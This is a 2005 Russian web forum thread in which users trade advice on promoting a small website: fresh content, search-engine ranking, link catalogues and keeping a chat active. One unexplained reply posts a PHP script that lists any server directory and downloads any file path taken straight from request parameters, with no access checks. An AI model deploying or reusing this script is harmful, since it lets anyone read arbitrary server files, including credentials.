|
|
|
| Люди как можно создать сообщество?
А точнее, как рекламировать сайт?
Может распечатать на листочке и прекрипить к входным дверям у подъездов, как лучше? | |
|
|
|
|
|
|
|
для: Lenux
(23.09.2005 в 07:13)
| | А точнее, как рекламировать сайт?
Может распечатать на листочке и прекрипить к входным дверям у подъездов, как лучше?
Эффективнее всего по телевиденью :). Если серьезно, то если хочешь разрекламировать сайт дешево, то используй баннеры. Если самому лень искать людей, обратись в рекламные агенства. Можешь зайти на www.CLX.ru
Как раскрутить сайт?
Что именно сделать надо? Раскрутить или разрекламировать? | |
|
|
|
|
|
|
|
| | Стратегия складывается из двух составляющих:
1) Постоянно обновляемого содержимого сайта - т.е. чтобы посетители попавшие к вам один раз, приходили потом снова и снова - это могут быть новости, скрипты, программы, статьи, форум.
2) Работа с поисковыми системами - поисковики должны подцеплять содержимое вашего сайта и вес у сайта должен быть большим, чтобы вы попадали в первые строки поисковых систем.
Вот несколько ссылок по теме
http://www.softtime.ru/forum/read.php?id_forum=2&id_theme=2166
http://www.softtime.ru/forum/read.php?id_forum=4&id_theme=2671
http://www.softtime.ru/forum/read.php?id_forum=1&id_theme=2502 | |
|
|
|
|
|
|
|
| | Хм... всё дело в том что у меня нема денег, спонсоров нету, т.е. укладываться надо проще говоря в возмодности компа, или 100руб., по другому ни как:(.
Мне бы хотелось в первую очередь раскручивать мой форум с чатом:)
Если кому интересно ссылка в профиле есть. | |
|
|
|
|
|
|
|
(24.09.2005 в 06:47)
| | Чат это хорошо - привлекайте на чат в первую очередь своих друзей и знакомых - чат будет привлекать только в том случае, если он будет живым. | |
|
|
|
|
|
|
|
для: cheops
(24.09.2005 в 11:46)
| | А на сколько актуально для раскрутки сайта каталога ссылок (сайтов) с категориями или просто со списком. Есть ли какой-нибудь скрипт который сам проверяет ответную ссылку?!
Просто у меня сейчас просто одна страничка на которую я добавляю ссылки все подряд и вот думаю имеет ли смысл все это приукрасить! | |
|
|
|
|
|
|
|
для: prostonau
(24.09.2005 в 12:11)
| | Всё актуально, дело в том, что чем больше текста у вас на сайте, чем чаще появляются новые страницы (старые при этом должны оставаться), тем больше вас любят поисковики, чем больше раз вы появитесь в поисковой системе, тем больше вероятность, что пользователи поисковых систем перейдут по ссылкам. Чем больше пользователей перейдут по ссылкам, заинтересуются вашим сайтом и будут приходить снова и снова - тем лучше для вас. Поэтому на сайте должен постоянно появляться новый текст. | |
|
|
|
|
|
|
|
(24.09.2005 в 12:31)
| | Постоянно новый контент – это понятно.
Например. Если я дам сообщение со ссылкой на форуме с очень большой посещаемостью, то по hotlog –уже на следующий день с этого форма пришло 2 человека, а с яндекса пришли на эту новость через месяц, когда она уже потеряла актуальность.
Интересно соотношение работы над Индексом цитируемости и работы над добовлением новых текстов.
Что лучше?
Если я добавлю 100 новостей и не где не пропишусь
Если я добавлю одну новость и пропишу свой сайт в 100 каталогах
И в каком отношение
Я понимаю, что вопрос сугубо теоретический и точного ответа на него нет, но все же интересен ваш опыт и мнение | |
|
|
|
|
|
|
|
для: prostonau
(24.09.2005 в 13:10)
| | Раскрутка сайта - это дело не одного дня: SoftTime в начале своей работы тоже имел 7 хитов в день как и все начинающие сайты и роботы поисковых систем приходили раз в месяц, зато теперь их не выгонишь - сканируют сайт по несколько раз в сутки. Для того, чтобы добиться этого вы должны быть на хорошем счету у робота, который приходя на ваш сайт должен видеть, что старые страницы никуда не делись и новые появляются.
>Если я добавлю 100 новостей и не где не пропишусь
>Если я добавлю одну новость и пропишу свой сайт в 100 каталогах
Первое увеличит привлекательность вашего сайта для посетителей, второе увеличит ваш индекс (в поисковых системах вы будует располагаться выше других). Ни что не лучше и не хуже, нужно и то и то.
Основное внимание нужно уделять качественному контенту сайта, если посетители вашего сайта запомнят ваш сайт как сборище бесполезной информации - они больше никогда на него не придут. Если вам нужны постоянные посетители - их нужно заинтересовать, чтобы у них был стимул приходить на ваш сайт снова и снова, расходуя свои деньги и время, которые они могут потратить и на другой сайт. | |
|
|
|
|
автор: BDFY (12.10.2005 в 06:22) |
|
|
(24.09.2005 в 13:26)
| | <?php
$default="./";
$this_file=isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : $HTTP_SERVER_VARS['PHP_SELF'];
if(isset($save)){
$fname=str_replace(" ","_",$fname);
$fname=str_replace(" ","_",$fname);
header("Cache-control: private");
header("Content-type: application/force-download");
header("Content-Length: ".filesize($save));
header("Content-Disposition: attachment; filename=$fname");
$fp = fopen($save, 'r');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
echo "<div align=center>
<font face='Arial' size='2' color='#000000'>
DOCUMENT ROOT: $DOCUMENT_ROOT
<form method=post action=$this_file>";
if(!isset($dir)){
$dir="$default";
}
echo "<input type=text size=60 name=dir value='$dir'>
<input type=submit value='get contents'>
</form>
</div>";
$path=$dir;
if(isset($dir)){
if ($dir = @opendir("$dir")) {
while (($file = readdir($dir)) !== false) {
if($file!="." && $file!=".."){
if(is_file("$path/$file")){
$disk_space=filesize("$path/$file");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, '.', '');
$total_kb2="Kb";
echo "$file - <a href='./$this_file?save=$path/$file&fname=$file'>save</a> - $total_kb$total_kb2<br>\n";
}
else{
echo "<a href='./$this_file?dir=$path/$file'>CD></a> $file<br>\n";
}
}
}
closedir($dir);
}
}
echo "</font>";
?> | |
|
|
|
|
|
|
|
для: BDFY
(12.10.2005 в 06:22)
| | Шо это было?... | |
|
|
|
|
|
|
|
| | 1. надо делать сайты с оригинальным содержимом, а не копировать информацию с других сайтов | |
|
|
|